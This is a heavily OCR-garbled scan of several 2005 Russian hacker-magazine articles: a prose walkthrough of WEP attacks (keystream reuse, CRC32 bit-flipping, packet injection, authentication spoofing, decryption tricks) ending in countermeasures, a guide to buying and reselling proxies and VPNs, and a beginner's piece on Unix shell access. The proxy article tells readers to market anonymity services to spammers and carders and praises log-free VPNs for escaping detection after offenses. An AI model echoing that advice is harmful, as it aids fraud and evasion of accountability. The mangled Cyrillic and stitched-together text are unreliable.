ную сумму сообщения с(М) и прибавляет ее 



к самому сообщению: Р = <М, с(М)>. 

О Выбирает вектор инициализации 
(ІпШаІізайоп Ѵесіог, IV) ѵ и генерирует ключе- 
вой поток (кеузігеат) ВС4(ѵ,к) - последова- 
тельность случайных байт, зависящих от IV ѵ 
и ключа к. 

Ѳ Применяет поразрядное исключающее 
«ИЛИ» (ХОР) к Р и ключевому потоку, полу- 
чая шифртекст: С = Р хог НС4(ѵ,к). 

О Передает вектор инициализации ѵ и 
шифртекст по беспроводному каналу. Это 
можно представить таким образом: А -[ѵѵіге- 
Іезз Ііпк]-> В: [ѵ,(Р хог ВС4(ѵ,к))], где Р = 
<М, с(М)>. 

Получатель выполняет следующие действия: 

О Используя полученный вектор ѵ и секрет- 
ный ключ к, генерирует ключевой поток 
НС4(ѵ,к). 

О Применяет операцию ХОР к паре «шифр- 
текст С - ключевой поток РС4(ѵ,к)», получая 
сообщение М' и контрольную сумму с'. Это 
можно представить таким образом: Р' = С хог 
РС4(ѵ,к) = (Р хог РС4(ѵ,к)) хог РС4(ѵ,к) = Р. 

Ѳ Проверяет равенство с' = с(М'). Если оно 
верно, то М' = М, то есть полученное сооб- 
щение равно исходному. 
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ВОЗДУШНЫЙ ОУРШПЯГ 




Процедура передачи сообщения 



Л ОСОБЕННОСТИ РЕППИЗПЦИИ 

ѴѴЕР использует потоковый шифр КС4 для ге- 
нерации ключевого потока. Это широко изве- 
стный, проверенный алгоритм, и разработчи- 
ки ѴѴЕР поступили правильно, что не стали 
изобретать своих шифров. Очевидно, что 
протокол надежен исключительно благодаря 
потоковому шифру РС4. Используя этот 
шифр, отправитель генерирует ключевой по- 
ток (кеузігеат) и ксорит этот поток с откры- 
тым текстом, получая шифртекст. Получатель 
генерирует тот же самый кейстрим и ксорит с 
ним шифртекст, получая исходный открытый 
текст. Операция ХОР зеркально применяется 
два раза: Р' = С хог К = Р хог К хог К = Р. 
Значит, основным моментом является выбор 
ключа. Один из главных параметров - его 
длина. В момент разработки стандарта огра- 
ничение на длину ключа накладывалось зап- 
ретом на экспорт стойкой криптографии за 
пределы США, окончательно снятым лишь в 
2000 году, а также фактом использования 
ѴѴЕР в маломощных портативных беспровод- 
ных устройствах (РОА, периферия). Так что 
длина ключа в первоначальной реализации 
ѴѴЕР была 64 бита: 40 бит непосредственно 
на ключ, используемый абонентами, и 24 би- 
та на вектор инициализации. Некоторые про- 
изводители беспроводных устройств сразу 
же сочли такой размер ключа недостаточным 
и выпустили свой вариант расширенного ѴѴЕР 
с длиной ключа 128 бит. На самом деле, ес- 

ЛИЧНЫЙ ОПЫТ 



тественно, ключ имеет длину 104 бита, а век- 
тор инициализации - все те же 24 бита. По 
идее, безопасность достигается за счет того, 
что методом подбора очень трудно разгадать 
ключ к. Но, как ты увидишь в дальнейшем, 
ни классический ѴѴЕР, ни ѴѴЕР расширенный 
не создали должного уровня защищенности, 
несмотря на размер ключа. 

ПОТОКИ НО ШЕР 

Хоть НС4 - вполне надежный алгоритм, его еще 
нужно уметь использовать. Так, никогда нельзя 
шифровать два разных сообщения одним и тем 
же ключевым потоком. Приведем пример. 
Предположим, открытые тексты Р1 и Р2 шиф- 
руются одним и тем же потоком К. Тогда 

С1 = Р1 хог К 
С2 = Р2 хог К 

Но тогда 

С1 хог С2 = Р1 хог К хог Р2 хог К = Р1 хог Р2 

Таким образом, злоумышленник, способный 
перехватить два шифртекста, путешествую- 
щих по радиоканалу, применив к ним опера- 
цию ХОН, получает в свои руки ХОН- разность 
двух открытых текстов! И если он знает хотя 
бы часть одного открытого текста, он может 
вычислить и второй открытый текст, так как 
реальные сообщения обладают избыточ- 
ностью, с помощью которой можно извлечь 
и Р1 , и Р2, имея только Р1 хог Р2. 

Л ПОВТОРНОЕ ИСПОПЬЗОВОНИЕ 

ключевого потока 

Как уже упомянуто выше, ключевой поток 
ѴѴЕР - НС4(ѵ,к), то есть зависит только от 
ѵ и к. К - фиксированный ключ, который для 
простоты эксплуатации обычно никогда не 
меняется. То есть ключевой поток зависит 
только от вектора инициализации (IV) ѵ, кото- 
рый, напомню, пересылается по сети в отк- 
рытом виде. Злоумышленник, прослушивая 




Структура сети, в которой АР выступает в роли маршрутизатора 






сеть долгое время, может заметить коллизию 
- шифрованный пакет с уже однажды исполь- 
зованным IV. Вспомни, что вектор инициали- 
зации имеет длину всего 24 бита. Таким об- 
разом, после 2 Л 24 (около 16 миллионов) па- 
кетов вектор инициализации ОБЯЗАТЕЛЬНО 
БУДЕТ ПОВТОРЕН. Отмечу, что длина фикси- 
рованного ключа к не играет в данном случае 
абсолютно никакой роли, так что данной 
проблеме подвержены как стандартная, так и 
расширенные реализации ѴѴЕР. 16 миллио- 
нов пакетов для загруженной беспроводной 
сети - не так уж и много: так, в 802.1 1 Ь-сети 
точка доступа, постоянно посылающая паке- 
ты размером 1 500 байт на скорости 1 1 мега- 
бит в секунду, исчерпает все значения IV за 
1500*8/(1 Г10 Л 6)*2 Л 24 = -18000 секунд, или 
5 часов. 

Но ситуация выглядит еще более плачевной, 
если учесть, что в протоколе не описан алго- 
ритм изменения IV, а лишь указана необходи- 
мость изменения и многие беспроводные се- 
тевые карты сбрасывают вектор инициализа- 
ции в 0 при каждом включении и линейно 
увеличивают его на 1 для каждого последую- 
щего пакета. Это значит, что каждая беспро- 
водная сессия начинается с повторного ис- 
пользования ключевого потока. Но даже в 
системах, где генерация IV происходит слу- 
чайно, согласно парадоксу дней рождений 
(есть такой, часто применяется в криптоана- 
лизе), коллизия возникнет после передачи 
примерно 5000 пакетов. В реальной системе 
есть множество путей получения текста паке- 
та. Многие поля, используемые в ІР-трафике, 
можно предсказать как стандартные (адрес, 
порт, флаги). Также злоумышленник может 
специально отправлять пакеты пользователю 
беспроводной сети с заранее известным со- 
держимым и отслеживать соответствующие 
зашифрованные пакеты. 

Допустим, в результате атакующий знает 
шифртекст и открытый текст для некоторых 
пакетов, зашифрованных с использованием 
известного IV ѵ. Тогда он с легкостью опреде- 
лит ключевой поток ВС4(к,ѵ) путем ксора 
шифртекста и открытого текста: 

(КС4(к,ѵ) хог Р) хог Р = КС4(к,ѵ) 

Определить ключ к у злоумышленника не по- 
лучится, однако он может занести значение 
ВС4(к,ѵ) в таблицу (словарь) для заданного ѵ. 
Тогда в следующий раз при перехвате пакета 
с таким же ѵ он просто применит операцию 
ХОР и прочтет данные: 

(КС4(к,ѵ) хог Р) хог КС4(к,ѵ) = Р 

Кроме того, в реализации ѴѴЕР с ключом в 
40 бит можно попытаться напрямую взло- 
мать ключ, применив современные вычисли- 
тельные ресурсы. Очевидно, что расширен- 
ный вариант ѴѴЕР с ключом в 1 04 бита хоть и 
усложняет эту задачу, но не выручает в слу- 
чае атаки по словарю, так как размер слова- 
ря будет тот же - вектор инициализации в 
обоих вариантах имеет размер 24 бита. 

^ П0ДИЕНП ППКЕТ0 

Для проверки целостности сообщения исполь- 
зуется контрольное суммирование. В ѴѴЕР для 
этой цели применяется алгоритм СВС32. Но 
СВС32 нестоек к коллизиям, кроме того, он 
обладает еще двумя недостатками: 



За полтора года моего увлечения вардрайвингом я собрал весь- 
ма красноречивую статистику. 80% тех сетей, публичных или 
приватных, что я встречал, вообще не использовали никакого 
шифрования. Оставшиеся 20% использовали стандартные 40- 
битные или 104-битные ключи, которые никогда не менялись. 
95% всех встреченных мной точек доступа имели стандартные 
53Ю или позволяли определить их (ВЗЗЮ). Все это говорит о 
том, что единственный способ адекватной защиты беспроводных 
сетей - переход на новый стандарт безопасности, который испра- 
вил бы недостатки ѴѴЕР. 




А Относительно 
недавно, в августе 
2004-го, был опуб- 
ликован новый 
способ взлома на 
основе статисти- 
ческого криптоана- 
лиза, который поз- 
волил в разы сок- 
ратить объем тре- 
буемой для взлома 
ключа статистики. 
Идея воплощена в 
утилите аігсгаск 
(шли. сгО.пеІ: 8040/ 
собе/пеіѵѵогк/). 




л На доодіе.сош 
можно найти множе- 
ство документов по 
безопасности ѴѴі-Рі. 



взпом 





* он высчитывается независимо 
от вектора инициализации ѵ; 

* СКС(М хог 0 ) = СРС(М) хог СКСф). 



Таким образом, есть возможность модифи- 
цировать сообщение, даже не зная его со- 
держимого. 

Допустим, есть сообщение М, соответствую- 
щий шифртекст С и вектор инициализации ѵ. 
С и ѵ были перехвачены злоумышленником, 
который хочет навязать получателю подлож- 
ное сообщение Р = М хог Р, где Р - некото- 
рое значение, выбранное злоумышленником 
(М хог М1 = Р, где М1 - измененное сооб- 
щение). Используя факт линейности СНС32 и 
линейности потокового шифра РС4, имеем: 

Если С = КС4(ѵ,к) хог Р, то (С хог 0) = КС4(ѵ,к) хог (Р хог 0) 

Злоумышленник вычисляет новый шифр- 
текст С' = С хог <Р, с(Р)> и передает полу- 
чателю пару (ѵ, С). Получатель расшифро- 
вывает подложный пакет: 



л На нашем диске 
ты найдешь 
фундаментальную 
документацию по 
протоколу ѴѴЕР и 
его недостаткам. 



<М',с |> = С хог КС4(ѵ,к) = С хог <0, сф)> хог КС4(ѵ,к) = <М, 
с(М)> хог 

<0, с(0)> = <М хог В, с(М) хог с(В)> = <М хог 0, с(М хог В)> = 
<Р, с(Р)> 

Затем проверяет с' = с(М') и принимает 
подложный пакет. 

А ВНЕДРЕНИЕ ПОКЕТО 

Как следствие предыдущей атаки, протокол 
уязвим к внедрению в канал связи подлож- 
ных пакетов, которые будут приняты жертвой 




как легитимные. Все, что нужно для прове- 
дения подобной атаки, - это знание открыто- 
го текста и соответствующего шифртекста. 
Имеем зашифрованный пакет С, вектор ини- 
циализации ѵ. Соответствующий открытый 
текст <М, с(М)>. Злоумышленник вычисляет 

КС4(ѵ,к) = С хог <М, с(М)> 

Затем он создает поддельное сообщение Р, 
считает контрольную сумму с(Р) и шифр- 
текст С = <Р, с(Р)> хог ВС4(ѵ,к). Затем он 
передает (ѵ, С). С точки зрения протокола, 

С - валидный пакет, в том смысле, что это 
корректно зашифрованное сообщение Р, 
поэтому получатель принимает такой пакет. 

А Фальшивая 

ЛУТЕНТИФИКЛЦИЯ 

В предыдущих атаках мы использовали знание 
одиночного открытого текста и соответствую- 
щего ему шифртекста и предположили, что 
для злоумышленника не составит труда найти 
пару путем выполнения некоторых активных 
действий. Как будет показано далее, протокол 
аутентификации клиента, используемый ѴѴЕР, 
позволяет злоумышленнику не беспокоиться 
ни о чем, чтобы найти такую пару. Это, пожа- 
луй, одна из самых курьезных уязвимостей в 
ѴѴЕР. Действительно, протокол аутентифика- 
ции создан для проверки факта, что клиент 
знает секретный ключ к. Вот как он работает: 

О Базовая станция (точка доступа) отсылает 
клиенту квитанцию открытым текстом. 

О Клиент шифрует квитанцию на ключе к и 
передает базовой станции (обычное ѴѴЕР- 
шифрование). 

® Базовая станция проверяет правильность 
шифрования, используя имеющийся у нее 
ключ к, и в случае успеха аутентифицирует 
клиента. Таким образом, злоумышленнику 
достаточно перехватить пару «открытый 
текст (квитанция) - шифртекст (ответ клиен- 
та)», в результате чего он получает возмож- 
ность не только внедрять пакеты, но и про- 
вести атаку на протокол аутентификации 
(аиШепМісайоп зрооТіпд), выдав себя за ле- 
гитимного клиента. 

© Получив открытый текст и шифртекст, 
злоумышленник извлекает из сообщения ѵ и 
РС4(ѵ,к) (см. выше). 

© Теперь он пытается внедриться в сеть, 
выдавая себя за легитимного клиента. Базо- 
вая станция посылает ему квитанцию (сііаі- 
Іепде зігіпд) М\ 

® Злоумышленник отвечает парой (ѵ, (<М\ 
с(М)> хог РС4(ѵ,к))). 

© Это корректный ответ (гезропзе зігіпд), и 
базовая станция принимает злоумышленни- 
ка, хотя он никогда не знал ключ к. 

А РОСШИФРОВКО СООБЩЕНИЙ 

Раз существует возможность модифициро- 
вать и внедрять пакеты, существует ли воз- 
можность полностью расшифровать пакеты? 
Злоумышленник может попытаться непосре- 
дственно декодировать трафик, но это пот- 
ребует существенных усилий, так как он не 
знает ключ к, а НС4 - довольно стойкий 
шифр. Разумеется, если ключ к имеет долж- 
ный размер - 104 бит достаточно, чтобы 
сделать его взлом труднореализуемым в ре- 
альных условиях, то есть мы считаем, что 
злоумышленник не обладает возможностью 
тут же запустить распределенный взлом 



ключа на мало-мальски приличном кластере. 
Но базовая станция (точка доступа, АР) зна- 
ет ключ к. Значит, можно попытаться обма- 
нуть АР: заставить ее расшифровать пакет и 
сообщить злоумышленнику результат. Есть 
три основных способа сделать это: 

* двойное шифрование (боиЫе-епсгурйоп); 

* ІР-перенаправление (ІР-гесІігесйоп); 

* атаки на реакцию (реасйоп айаскз). 

А ДВОЙНОЕ ШИФРОВОНИЕ 

Потоковые шифры симметричны, то есть ис- 
пользуют один и тот же ключ для шифрования 
и дешифрования сообщений. Если злоумыш- 
ленник хочет расшифровать какой-либо пакет, 
он может проделать следующие операции: 

© присоединиться к беспроводной сети, ис- 
пользуя аиШепШісайоп зрооТіпд; 

© перехватить зашифрованный пакет; 

® используя второе соединение, послать 
перехваченный пакет на свою машину в 
беспроводной сети. 

Точка доступа зашифрует уже однажды за- 
шифрованный пакет, и если вектор инициа- 
лизации в этот момент будет выбран такой 
же, как и в момент первоначального шифро- 
вания, то повторное шифрование расшифру- 
ет пакет. Злоумышленнику только останется 
перехватить расшифрованное сообщение. 
Основная трудность, препятствующая широ- 
кому применению данной атаки на практике, 

- требования от АР оба раза шифровать па- 
кет, используя один и тот же IV. Возникает 
так называемая временная проблема: нужно 
дождаться, когда АР будет вынужден заново 
использовать определенный IV. Данная атака 
находит свое применение в сетях, где АР ис- 
пользует примитивное инкрементальное уве- 
личение IV с каждым пакетом. 

А ІР-ПЕРЕНРПРРВПЕНИЕ 

Эта атака позволяет избежать временной проб- 
лемы. Она опирается на вышеуказанные атаки. 

* Злоумышленник присоединяется 

к беспроводной сети (аиіііепіііісаііоп зрооТіпд). 

* Перехватывает зашифрованный пакет от 
клиента и модифицирует его таким 
образом, чтобы адресом назначения 

стал ІР-адрес подконтрольной ему машины. 

* Передает измененный пакет базовой 
станции, которая расшифровывает его и 
шлет получателю - машине злоумышленника. 

Очевидно, данная атака имеет место в сетях, 
где точка доступа играет роль гейта в провод- 
ную сеть, например когда беспроводная сеть 
связана с интернетом. Только в этом случае АР 
вынужден расшифровывать пакет и передавать 
его далее проводному маршрутизатору. 

Потоки НО РЕОКЦИЮ 

Эта атака может быть проведена, даже если 
беспроводная сеть не имеет связи с другими 
сетями, АР не расшифровывает пакеты и не 
передает их дальше. Однако она требует, 
чтобы шифруемые пакеты являлись ТСР-па- 
кетами, что, как правило, выполняется. Атака 
основана на том факте, что если при моди- 
фикации ТСР-пакета контрольная сумма (ТСР 
сііескзит) окажется неверна, то пакет будет 
отброшен и затем послан заново. Но если 
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шрр и новые стандарты безопосности 



ѴѴЕР2 не решил всех проблем, и индустрия взялась за разработ- 
ку нового стандарта, призванного заменить ѴѴЕР. Таким стандар- 
том стал 802. 1 1 і, представляющий собой комплексную систему 
обеспечения безопасности. Он включает в себя системы аутен- 
тификации, создания новых ключей для каждой сессии, управле- 
ния ключами (на базе технологии Ветоіе Ассезз ОіаІ-Іп ІІзег 
Зегѵісе, ВАБІІІЗ), проверки подлинности пакетов и т.д. Состав- 
ная часть 802.1 1 і, ѴѴРА (ѴѴі-Рі РгоіесіесІ Ассезз), была разработа- 
на в начале 2003 года с целью уже сейчас дать производителям 
802.1 1 Ь/д устройств адекватную защиту. На текущий момент дос- 
тупна вторая версия протокола, ѴѴРА2. ѴѴРА исправляет две ос- 
новные ошибки ѴѴЕР: 

* ѴѴРА обеспечивает должный уровень шифрования данных. 
Стандарт основан на протоколе ТКІР (ТетрогаІ Кеу Іпіедгііу 
РгоІосоІ), который использует привязку ключа к каждому пакету 
и расширенный вектор инициализации. 

* ѴѴРА обеспечивает должный уровень аутентификации пользо- 
вателя, благодаря протоколу ЕАР (ЕхіепзіЫе АиіЬепііІісаііоп 
РгоІосоІ). Он предполагает наличие централизованного сервера 
аутентификации пользователей, например ВАОІІІЗ. 

Также ѴѴРА учитывает специфику применения беспроводных се- 
тей. Так, для домашних и малых офисных сетей (ЗОНО), где нет 
нужды держать ВАОІІІЗ-сервер, ѴѴРА предлагает технологию РЗК 
(Рге-ЗЬагесІ Кеу) - как и ранее, пользователи и точка доступа долж- 
ны разделять некий секрет для авторизованной работы, но в дан- 
ном случае это не напрямую ключ шифрования. По аналогии с 
ѴѴЕР акроним ѴѴРА получил свой неформальный вариант расшиф- 
ровки как «ѴѴіІІ РгоІесІ АІІгідЫ» («Будет защищать нормально»). 




контрольная сумма модифицированного па- 
кета верна, в ответ будет отправлено подтве- 
рждение (АСК). Отметим, что в данном кон- 
тексте подразумевается именно контрольная 
сумма ТСР-пакета, контрольная сумма сооб- 
щения всегда должна совпадать, иначе такой 
пакет будет отброшен на уровне ѴѴЕР. 

Значит, мы можем модифицировать пакет, 
меняя всего один бит, и следить за реакци- 
ей получателя, определяя, отбросил ли он 
пакет или послал подтверждение. Так, бит 
за битом, мы определим исходное сообще- 
ние. Подробное описание этой атаки не 
совсем тривиально и занимает много мес- 
та, так что советую тебе обратиться к гуглу. 

А ПОСЛЕДСТВИЯ И КОНТРМЕРЫ 

Похоже, ѴѴЕР не обеспечивает ничего из то- 
го, что должен: 



* Конфиденциальность. Мы можем читать 
защищенный трафик. 

і Контроль доступа. Мы можем внедрять 
сообщения в беспроводную сеть. 

* Целостность данных. Мы можем 
модифицировать защищенный трафик. 

Именно поэтому акроним ѴѴЕР многие рас- 
шифровывают какѴѴопЧ Еѵеп Ргоіесі («Ни- 
фига не защищает»). 

После обнаружения фундаментальных не- 
достатков в ѴѴЕР в 2001 году была выпущена 
новая спецификация, ѴѴЕР2, которая исполь- 
зовала 1 28-битный ключ и 1 28-битный век- 
тор инициализации. В то же время в ней 
применены те же алгоритмы шифрования 
ВС4 и та же система контроля целостности 
СВС32. В силу этого ѴѴЕР2 не решает всех 
вышеописанных проблем и потому широкого 
распространения не получил. Ни одна из 
спецификаций не рассматривает проблемы 
реализации протокола, так, ѴѴЕР не требует, 
а лишь рекомендует случайную генерацию 
IV, регулярную смену ключа и т.п. Разумеет- 
ся, многие компании разработали свои ме- 
ханизмы защиты беспроводного трафика, 
так, в оборудовании Сізсо Аігопеі проблема 
отчасти решается с помощью протокола 
І_ЕАР (Цдбіѵѵеідііі ЕхІепзіЫе АиШепйсайоп 
Ргоіосоі - упрощенный расширяемый прото- 
кол аутентификации). Вместо того чтобы 
постоянно использовать один и тот же ѴѴЕР- 
ключ, клиент каждый раз при регистрации 
для очередного сеанса работы динамически 
генерирует новый. Ключи у всех клиентов 
уникальные, что снижает, но не исключает 
риск конфликта IV. Китайское правительство 



ввело свой стандарт защиты беспроводных 
сетей - ѴѴАРІ (ШШ АиШепйсайоп Ш Ргіѵасу 
ІпТгазІгисШге), но дальше своей страны он 
распространения не получил. 

Итак, пока новые стандарты обеспечения бе- 
зопасности не получили широкого распрост- 
ранения, лучшим решением будет осознание 
того факта, что ни одно из существующих 
беспроводных средств протекции нельзя 
назвать действенным. Это не значит, что о 
безопасности в беспроводных сетях можно 
забыть, это значит, что для защиты беспро- 
водного трафика сегодня стоит применять 
какое-нибудь доказавшее свою надежность 
традиционное решение, например ѴРІМ или 
ІРЗес. Кроме того, как мы знаем, ѴѴЕР не да- 
ет возможности контролировать доступ к се- 
ти, значит, точка доступа должна обеспечи- 
вать дополнительную фильтрацию по МАС- 
адресам, иметь списки контроля доступа. 
Еще раз напомню, что стандарт не требует, 
но рекомендует периодическую смену сек- 
ретного ключа. К сожалению, это пожелание 
чаще всего не соблюдается, так как опера- 
тивно и безопасно вручную сменить ключи в 
крупной сети - задача не из легких. Самое 
быстрое решение - отключить трансляцию 
55Ю, чтобы точку доступа могли находить 
лишь те клиенты, которым заранее известен 
ее идентификатор. Все эти методы могут ос- 
ложнить задачу злоумышленника. По моему 
опыту, на текущий момент самой эффектив- 
ной, хотя и трудоемкой защитой является 
принудительное ІРЗес-шифрование всего 
беспроводного трафика. 

А ЗОКПЮЧЕНИЕ 

Основной вывод, который хочется сделать, - 
системы защиты очень сложно спроектиро- 
вать должным образом. ѴѴЕР - яркий пример 
того, как казавшаяся надежной на бумаге 
схема была загублена ее неуклюжим вопло- 
щением. А этот момент обязательно надо 
учитывать. Есть вектор инициализации, но 
какой он, как должен меняться, каков алго- 
ритм его выбора? Есть контрольное сумми- 
рование, но по какому алгоритму? Есть 
шифр ВС4, но применим ли он здесь? 
Подобные системы защиты должны разраба- 
тываться публично, с привлечением профес- 
сиональных криптоаналитиков. □С 




^Советую тебе также 
прочесть эту статью: 
ѵілш.зесигіІуЕосиз.со 
т/іпІосиз/1814. 




л В номере, кото- 
рый ты держишь в 
руках, ты найдешь 
очень интересную 
статью о практи- 
ческой реализации 
взлома ѴѴі-Рі. 
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ХПКЕР/№02(74)/2005 



I Олень (оіешіпе.зтод.гаіедаіза.па.таіі.іи) 



ИУПИЕ ШТРПЦЕПТИВ 



* Л 



/ 

І і 1 



ы часто слышал на каналах в ІКС и в прочих виртуальных местах такие фразы: «Вот у меня ВПН подорожал, а как лагап, так и латает». 
9 тебя постоянно возникали мысли: а зачем нужны все эти ВПН, соксы и прочие прибпуды? Поверь, все это добро необходимо не только 
дня того, чтобы скрывать свои реальные адреса в интернете, но и еще для того, чтобы заметно ускорить свое подкпючение к нему. Из 
этого материала ты узнаешь, где можно приобрести такие успуги и где их продать. 

ГДЕ ПРИОБРЕСТИ И РЕППИЗОВПТЬ ЗПЩИТНУ Ю ШНЯГУ 



А 



А ВЯЗПНЫЕ носочки 
ОТ ПЮБИИОИ БПБ9ШКИ 

Т ак же часто ты видел, как люди 
клянчат на каналах прокси, жела- 
тельно соксовые, да еще и на нес- 
тандартных портах. Но откуда их 
взять - опять же, встает такой ре- 
зонный вопрос. В Сети существует 
уйма сервисов, на которых за оп- 
ределенную плату ты получишь в 
любой момент нужное количество адресов ра- 
бочих прокси-серверов. Один из ярких тому 
примеров - шѵшургохуМ. Все, что тебе необ- 
ходимо, - стукнуться в асю к админу ака суп- 
порту сервиса, указанную на главной странице 
сайта, оплатить услуги и получить свой 
собственный логин и пароль для личного дос- 
тупа. После этого у тебя появится возможность 
не только получать в любой момент нужное ко- 
личество проксей, но и делать выборку по 
нужным странам и штатам, если прокси дис- 
лоцируются в США. Однако это не значит, что, 
зайдя дважды за минуту, оплатив анлимитный 
доступ к 100 соксам, ты получишь список из 
двух сотен проксей. Совсем нет. В сутки ты 
так и будешь получать те самые 1 00 айпишни- 
ков, за которые ты отдал свои кровные сбере- 
жения, только в процессе того, как прокси бу- 
дут дохнуть, список будет пополняться свежи- 



ми носочками. Стоит такая услуга совсем не- 
дорого: от 30 до 1 50 вечнозеленых в месяц. За 
30 баксов ты будешь ежедневно получать спи- 
сок из 50 проксей, а за 1 50 долларов США 800 
соксов будут постоянно находиться онлайн 
специально для тебя. Если исходить из соот- 
ношения цена/нужное количество, рациональ- 
нее всего оплачивать доступ к 100-400 прок- 
сям ежедневно. Помимо анлима, есть еще и 



возможность затариваться единоразово нуж- 
ным количеством носков. В этом случае цена 
одного айпишника с нестандартным портом 
будет колебаться от полубакса до десяти цен- 
тов. Однако сама цена, как и в предыдущем 
случае, зависит, опять-таки, от количества 
единоразово приобретаемых соксов. 

Оплату админ принимает не только в виде 
ѴѴМ2, но и по системе РеіІтагсІ. 
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РіпсШоіпеі 



Мт 

Но прокси не всегда подходит для ускорения соединения. Бывает, что этого не- 
достаточно и это дико неудобно. В таком случае как нельзя лучше тебе подой- 
дет услуга ѴРИ. Устанавливаешь новое соединение, и трафик идет через него. 
Никакого палева твоего реального ІР, особенно если ты ходишь еще и через 
8оскз-сервер, и реальное увеличение скорости. В Сети также огромное количе- 
ство контор, предоставляющих подобные услуги. Кстати, сам Форб занимается 
этим бизнесом, но на момент написания статьи мы не смогли его застать он- 
лайн, чтобы выяснить адрес его сервиса :). Если твой провайдер режет все 
внешние соединения с ѴРИ -серверами, есть возможность приобрести доступ к 
услуге ОрепѴРИ - соединение осуществляется за счет консольного клиента, 
пускающего трафик через 5005 порт. Кстати, многие конторы настраивают свои 
сервисы таким образом, что твой внешний ІР-адрес будет постоянным, а твой 
внутренний адрес в ѴРІМ-сети каждые сутки будет меняться автоматически. Учи- 
тывая то, что логи зачастую «случайно» не ведутся, вычислить тебя при каких- 
либо правонарушениях будет практически невозможно. Настраивается и то и 
другое за две минуты. Если ты, конечно, не полный отморозок. 

Ріпбпоі.сот - контора, предоставляющая услугу ѴРИ за очень небольшую плату, поряд- 
ка 30-40 долларов за месячный доступ. Здесь же ты сможешь заодно затариться но- 
сочками и прочими приблудами для безопасного серфинга всемирной паутины. 

^ПМЫИСПНИСУСПМИ! 

Если же ты сам имеешь возможность продавать услуги сокс-серверов, ВПН 
и т.д., то тебе обязательно надо состряпать свой сайт, где будут размещены 
все расценки, пользовательские скрипты и прочие навороты для удобной 
работы с посетителями. Однако этого недостаточно, если ты хочешь рубить 
как можно больше бабок в Сети. Для увеличения продаж необходимо и уве- 
личение клиентского контингента. А какой тип людей обожает пользоваться 
подобными услугами? Правильно: спамеры, кардеры и тому подобные лич- 
ности. Заходи на тот же шѵѵ.ссрош.пеі и предлагай там свои услуги. К сожа- 
лению, в свете последних событий повальное большинство такого рода фо- 
румов ввело у себя платную регистрацию. Либо же ты получишь доступ к 
чтению и оставлению сообщений на сайте только после того, как тебя дос- 
конально проверят и поручатся люди, уже зарегистрированные на форуме. 
Так что будь готов к некоторым трудностям и предварительным расходам. 

Но оно того стоит, поверь. 

Л ТЗЕ ЕНД 

Вот и все, что я хотел тебе сказать. Целую в пятку, твой Олень Оленевич. 







Типичный форум, на котором твои услуги оторвут с руками 


















заводе?, ш-дая 
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спи ты встал на шаткую хакерскую дорожку ипи просто решип разобратьса с ипіх, то, несоиненно, столкнешься с загадочным словом 
«шепп». В жизни любого взломщика ипіх-шеппы играют огромную роль, в десятки раз облегчая трудную работу. Чтобы полноценно 
работать с ІІліх-системами, ты должен четко знать, зачем вообще нужны шеппы и что с ними делать. Получить ответы на подобные 
вопросы тебе поможет этот увлекательный материал. 




ВСЕ, ЧТО НУЖНО знать НПЧИНПЮЩЕМУ КОКЕРУ О ШЕПП-ДОСТУПЕ 



л 



А ТЕОРЕТИЧЕСКИЕ ОСНОВЫ 

Т ермин «шелл» неразрывно свя- 
зан с операционной системой 
ІІпіх. Именно поэтому многие 
хакеры употребляют сочетание 
«ипіх-шелл». Если заглянуть в 
англо-русский словарь, то сло- 
во «зМеІІ» переводится как 
«оболочка». Но для того чтобы 
понять смысл термина, одного перевода не- 
достаточно. Итак, шелл - это оболочка опе- 
рационной системы, которая взаимодейству- 
ет с пользователем, специальная програм- 
ма, которая получает от юзера команды и 
возвращает результат их выполнения. Одна- 
ко понятие шелла очень тесно связано с 
ипіх, и поэтому его часто ассоциируют с 
предоставленным удаленным доступом к 
системе. Так, слова «дать шелл» надо восп- 
ринимать не как «дать исходники шелл-инте- 
рпретатора», а как «предоставить удаленный 
доступ к системе». Неважно, каким спосо- 
бом этот доступ осуществляется, главное, 
чтобы пользователь имел возможность вы- 
полнять команды на сервере. 

Существует также понятие «аккаунт», кото- 
рое можно интерпретировать как «учетная 
запись». Когда тебе дают шелл, то обяза- 
тельно предоставляется аккаунт в виде пары 



«логин: пароль». Каждый аккаунт обладает 
определенными правами и заранее пропи- 
сывается администратором системы. Теперь 
важно определиться, какие вообще бывают 
шелл-доступы. Они подразделяются на два 
типа в зависимости от прав пользователя и 
вида доступа к системе. 

О Непривилегированный шелл-доступ реа- 
лизуется при помощи аккаунта, который 
имеет ограниченные права в системе. К при- 
меру, обладатель такого шелла не сможет 
добавлять пользователей и просматривать 
некоторые каталоги (в зависимости от защи- 
ты). Возможно, что юзера урежут и в сете- 
вых правах. При этом будет невозможно 
поставить консольную аську, задосить диа- 
лапщика, запустить бота и т.п. 

О Привилегированный шелл, или ругшелл. 
Обладатель такого шелла имеет неограничен- 
ные возможности. Он может добавлять/уда- 
лять юзеров, закрывать порты на машине, 
ставить софт и запускать любую команду. В 
общем, полная свобода действий. Однако, уп- 
равляя такой системой, нужно четко понимать 
смысл набранной команды. Иначе можно так 
накосячить, что сервер попросту упадет. 

В зависимости от обстоятельств получения 
шелл-доступ подразделяется на неофици- 
альный и официальный. Первый случай оз- 



начает, что машина была взломана и в сис- 
темные файлы были внесены изменения, 
обеспечивающие несанкционированный вход 
в систему. Обычно чтобы подцепиться на та- 
кой сервер, тебе предоставляется ІР-адрес и 
нестандартный порт с установленным серви- 
сом 83Н на нем. Это самый ненадежный вид 
доступа. Суди сам, если администратор про- 
палит, что его систему сломали, он тут же 
переустановит систему и заткнет все дырки. 
Официальный доступ оформляется по всем 
правилам. В систему добавляется имя поль- 
зователя, которому устанавливается пароль. 
Затем владельцу дают ІР-адрес сервера, а 
также заветный аккаунт. Чтобы подключиться 
к системе, юзер запускает специальную 
программу и заставляет ее соединиться с ІР- 
адресом. Последним шагом будет ввод логи- 
на и пароля. Если все сделано верно, на сер- 
вере запустится шелл-интерпретатор, позво- 
ляющий пользователю выполнять команды. 
Последнее, что можно сказать по поводу шелл- 
доступа, это то, что он может предоставляться к 
различным операционным системам. Несмотря 
на то что сегодня мы говорим о шелл-доступе к 
ипіх-системам, могут возникнуть некоторые 
проблемы. Так, например, команды РгееВЗЭ 
немного отличны от запросов І_іпих. Но в це- 
лом, конечно, системы похожи друг на друга. 
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ШЕПП- ЭТО ПРОСТО! 




Мутим доступ к шеллу 



^ПОДКПЮЧОЕИСЯ! 

Я не буду тебе рассказывать, где найти 
шелл-аккаунт. В июльском выпуске я писал 
статью «Шеллом не поделитесь?», в которой 
четко и ясно изложил методы получения ак- 
каунтов. Ты теперь умный и знаешь теорию, 
поэтому вопросов возникнуть не должно. 

